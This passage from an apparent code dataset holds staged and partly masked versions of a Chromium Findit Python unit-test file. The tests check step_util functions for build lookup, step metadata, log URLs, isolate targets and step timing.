'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog', return_value=\n {'canonical_step_name': 
'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n <mask token>\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n self.assertEqual('invalid', step_util.LegacyGetStepMetadata('m',\n 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual('step_name', step_util.LegacyGetCanonicalStepName(\n 'm', 'b', 200, 'step_name on a platform'))\n\n @parameterized.expand([({'canonical_step_name': 'step_name'},\n 'step_name'), (None, 'step_name'), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata,\n expected_canonical_step, mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(expected_canonical_step, step_util.\n GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n <mask token>\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n 
mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n <mask token>\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-4": "<mask token>\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100,\n 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600,\n 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n lower_bound_target = IsolatedTarget.Create(build_id - 1, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n upper_bound_target = IsolatedTarget.Create(build_id, luci_name,\n bucket_name, master_name, builder_name, gitiles_host,\n gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(master_name, builder_name,\n target_name, requested_commit_position))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertEqual(valid_build_102, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info\n ):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_101, valid_build_102]\n self.assertIsNone(step_util.GetValidBuild(master_name, builder_name,\n 100, step_name, True, 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n mocked_get_build_info.side_effect = [invalid_build_100,\n invalid_build_99, valid_build_98]\n self.assertEqual(valid_build_98, step_util.GetValidBuild(\n master_name, builder_name, 100, step_name, True, 2))\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 
'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(self,\n *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, 100, 10)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertEqual(upper_bound_build_number, lower_bound.build_number)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_\n ):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 10000)\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', None, upper_bound_build_number, 50)\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(swarming, 'CanFindSwarmingTaskFromBuildForAStep',\n return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep('m',\n 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=False)\n def testStepNotSupportedByFindit(self, _):\n 
self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(waterfall_config, 'StepIsSupportedForMaster',\n return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(step_util.IsStepSupportedByFindit(GtestTestResults(\n None), 'browser_tests', 'm'))\n\n @parameterized.expand([({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': wf_testcase.\n SAMPLE_STEP_METADATA, 'expected_step_metadata': wf_testcase.\n SAMPLE_STEP_METADATA},), ({'step_log_return': None,\n 'expected_step_metadata': None},), ({'step_log_return': None,\n 'expected_step_metadata': None},)])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=\n 'log_stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=json.\n dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n 
self.assertIsNone(step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's',\n None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n 
mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog', return_value=\n {'canonical_step_name': 'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n\n def testStepIsSupportedForMasterCompile(self):\n master_name = 'm'\n builder_name = 'b'\n build_number = 123\n step_name = 'compile'\n self.assertTrue(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n self.assertEqual('invalid', step_util.LegacyGetStepMetadata('m',\n 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual('step_name', 
step_util.LegacyGetCanonicalStepName(\n 'm', 'b', 200, 'step_name on a platform'))\n\n @parameterized.expand([({'canonical_step_name': 'step_name'},\n 'step_name'), (None, 'step_name'), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata,\n expected_canonical_step, mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(expected_canonical_step, step_util.\n GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'isolate_target_name': 'browser_tests'})\n def testLegacyGetIsolateTargetName(self, _):\n self.assertEqual('browser_tests', step_util.\n LegacyGetIsolateTargetName('m', 'b', 200,\n 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOSPartialMatch(self, mock_get_step_metadata):\n step_util.GetOS(123, 'builder_name', 'step_name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetOS(123, 'builder_name', 'step_name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 
'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-5": "# Copyright 2018 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport datetime\nimport json\nimport logging\nimport mock\n\nfrom parameterized import parameterized\n\nfrom buildbucket_proto import common_pb2\nfrom buildbucket_proto.build_pb2 import Build\nfrom buildbucket_proto.step_pb2 import Step\n\nfrom common.waterfall import buildbucket_client\nfrom infra_api_clients import logdog_util\nfrom libs.test_results.gtest_test_results import GtestTestResults\nfrom libs.test_results.webkit_layout_test_results import WebkitLayoutTestResults\nfrom model.isolated_target import IsolatedTarget\nfrom model.wf_build import WfBuild\nfrom services import step_util\nfrom services import swarming\nfrom waterfall import build_util\nfrom waterfall import waterfall_config\nfrom waterfall.build_info import BuildInfo\nfrom waterfall.test import wf_testcase\n\n\nclass MockWaterfallBuild(object):\n\n def __init__(self):\n self.build_id = None\n self.log_location = 'logdog://logs.chromium.org/chromium/buildbucket/path'\n\n\ndef _MockedGetBuildInfo(master_name, builder_name, build_number):\n build = BuildInfo(master_name, builder_name, build_number)\n build.commit_position = (build_number + 1) * 10\n build.result = (\n common_pb2.SUCCESS if build_number > 4 else common_pb2.INFRA_FAILURE)\n return build\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100, 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600, 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n\n lower_bound_target = IsolatedTarget.Create(\n build_id - 1, luci_name, bucket_name, master_name, builder_name,\n gitiles_host, gitiles_project, gitiles_ref, 